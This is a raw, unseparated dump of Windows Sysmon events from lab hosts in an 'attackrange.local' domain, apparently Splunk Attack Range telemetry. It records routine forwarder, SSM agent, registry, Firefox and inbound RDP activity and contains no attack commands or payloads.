354300x80000000000000001046642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.630{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50934-false10.0.1.12-8000- 23542300x80000000000000001046641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:59.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80969C9AAC40FD81D3ACA6C4913FE959,SHA256=2D793D43FAC5F71D648B8EBFDA1C36B8D717D9722668F328811C8FA5FEF986A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D035EC751D7D14925E9694156767BD8,SHA256=4B9ECBEA49D6FB034781680021D45D842E66B785E287032A202F8BBABC71D40A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB2E255D74A76241598EAF3067116344,SHA256=03620E4F0E7B6ED300D5E9B7C13EC74A2EB5F354492B5531AF9C1B17406449A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:00.520{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C79AD9AD3BBFC1FFC59C27C804414CFA,SHA256=2B589042B982C35A8A0EBECF7D9F72BB284830FF154BF288B0FB7871877BF30E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:00.144{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707E970A4375B2728B9894F84683B50D,SHA256=1DA8C011511956A2F3D4DD1CD51AA80A094165C8392735769C51641BAAE0E639,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:01.614{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37C174374A66EC1599A9D38D5F31227A,SHA256=8ADA828E16E323B846EF9CD35BAAA8C315449ACDBF8066F415CDCC0B46308CCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:01.175{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18343043D509CDE01714D078654B4D08,SHA256=95B22A7B403C4C2094BE378CED6F9BBA712BE625C83CFB4AA5149A03D8CA5785,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000806404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.370{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57182-false169.254.169.254instance-data.eu-central-1.compute.internal80http 354300x8000000000000000806403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.290{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57181-false169.254.169.254instance-data.eu-central-1.compute.internal80http 354300x8000000000000000806402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.233{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57180-false169.254.169.254instance-data.eu-central-1.compute.internal80http 354300x8000000000000000806401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.232{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57179-false169.254.169.254instance-data.eu-central-1.compute.internal80http 23542300x8000000000000000806400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:01.207{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D035EC751D7D14925E9694156767BD8,SHA256=4B9ECBEA49D6FB034781680021D45D842E66B785E287032A202F8BBABC71D40A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:02.629{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46237DB26E0659A2EB47B6F73E03F9FC,SHA256=C7D35973F6E08702D7CF5DC92A445270EEBDB4DEFD90A7B1BFB611CB04886416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:02.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D933DD0902C22A2944C2452D85A95C9F,SHA256=6C48C5AF5C90329234A3C8077EA6F27F8AAA2B9384DC4C7D743E7A17609E8E66,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:00.131{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.242.110.130amahgoob33.ptr1.ru64815-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:03.645{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5FF9FF3C44CE5C9CDD218879DAFE453,SHA256=AD357ADD71D26217AB45B79BD51CC93C28D5F12D7257C26013EAD8293169D3FA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD7DD747D1B4238617651051CE7DA1DF,SHA256=69BBB0B0835CB13F1A52E3278A0987A64C68CE4C11C75D72AD7A5DCA1CB3A051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:04.660{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6521D5EB027F1B80EC620E80E9846C,SHA256=5157D72C9F8F4C14B36103FDB8AF87A114DE981475DC3AFE28683A5222BFAF32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:04.223{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99173AFD2F48E3260D9BDD391279B26E,SHA256=2A80DA00BBEF0F16B094000FA4D09F295995F5DA1E1022E86A0AA4A4A3E74B86,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000806419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000806418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f5c6106) 13241300x8000000000000000806417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x958557d5) 13241300x8000000000000000806416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xf749bfd5) 13241300x8000000000000000806415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x590e27d5) 13241300x8000000000000000806414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000806413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f5c6106) 13241300x8000000000000000806412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x958557d5) 13241300x8000000000000000806411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xf749bfd5) 13241300x8000000000000000806410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x590e27d5) 354300x8000000000000000806409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:03.200{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57183-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:05.692{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E329E7B9BFA125E316E2299768E6FC48,SHA256=C998DF935F37C3721F18E77BF83C09AF142678B89C1B178BFC006B548FC19B62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:56.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50935-false10.0.1.12-8000- 23542300x80000000000000001046648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:05.241{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9B06B467F90CE1D48360D9581C3589C,SHA256=3DA8E55A149A45F89EC4EB2E7C3ADC40AB7CF0FC5B57434251D98AE9DA5E7584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:06.723{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CCA275FB53E62A9A67A2F65E0EA5AD7,SHA256=B8CFD00946239AB3433CA7537F4D898C6F5F40B3595E54C1699A2CFA05D6F279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.272{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4821AD28D4218F6C109665A31B0B1DF6,SHA256=936902E2CCEB906ABE4457DAF6744DDFE060E644CB79F53749476EBD3AA4560F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.157{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.125{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001046652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.103{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001046651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:46:06.103{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.371.100454002C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001046650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:46:06.103{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.371.100454002C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:07.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D3AF0524EA92B94230144259EC3343F,SHA256=11F87E1F85CD23D2C2036DC60591A39E53E3031B21F439B30B401C66D8E0F46A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:07.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FD8261823C1779A961E4C14DE70F232,SHA256=747C53A6463110E4394BF6D26D8765A870CFDB135CC0D858BF35D65242BC56F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08230CA84345E31ABC886DF97DACF4A7,SHA256=DEF277E50971AB79584E2D950D8D6D60A9E4FDA33B0A5A1F914CB69DD061FB6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:08.288{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC99CE4F6647E61D812C6C328AE4D3D,SHA256=C035CFDAC837C6AC4C5A108030E20258A14E003D3DB817746962E7BEB49149FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:07.376{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-53237-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.520{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D56480BC466A5AB86C9DC6C25702D12E,SHA256=7631F43EAFFA9992E0E2EA03B512F697E513A8880965330D84A7C524CCE4EED4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.520{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA8E4DA43336E193DFBCFCA86BA7D0CC,SHA256=B990C5A8E843BB0C5490B78C40B89508A164F467288C7B7F4ED543E229475183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:09.832{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B95488D8A00D6DE7B818EDD92146DE4,SHA256=84C83E2CC39F4005F979AF7A51E981D39C245607FBEFC8D6AA1F3A1C170DB1CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:01.057{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57184-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001046658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:09.289{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC69BF77DE725DFCEB88B4B34C366710,SHA256=FFD53255151BDB7309D518950ADE266D52C8B50EBC4D1DDDE347C65CC3C6BCCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.309{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57185-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000806428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:07.656{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57184-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:10.832{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985A5FE341A16239FA2546ECFF39DCFF,SHA256=B411A95AC654D068036B0C6BA3C3BECF8DA775FD9ED94DC14675D471D03BFA9B,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001046661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:02.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50936-false10.0.1.12-8000- 23542300x80000000000000001046660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:10.304{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CF6A7C8F6BF9202DCA36D742A705350,SHA256=D0DBD7D93D2674582BE781E392CBB76511E1DF49B3D14FA57CD04306F45B103E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:11.864{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 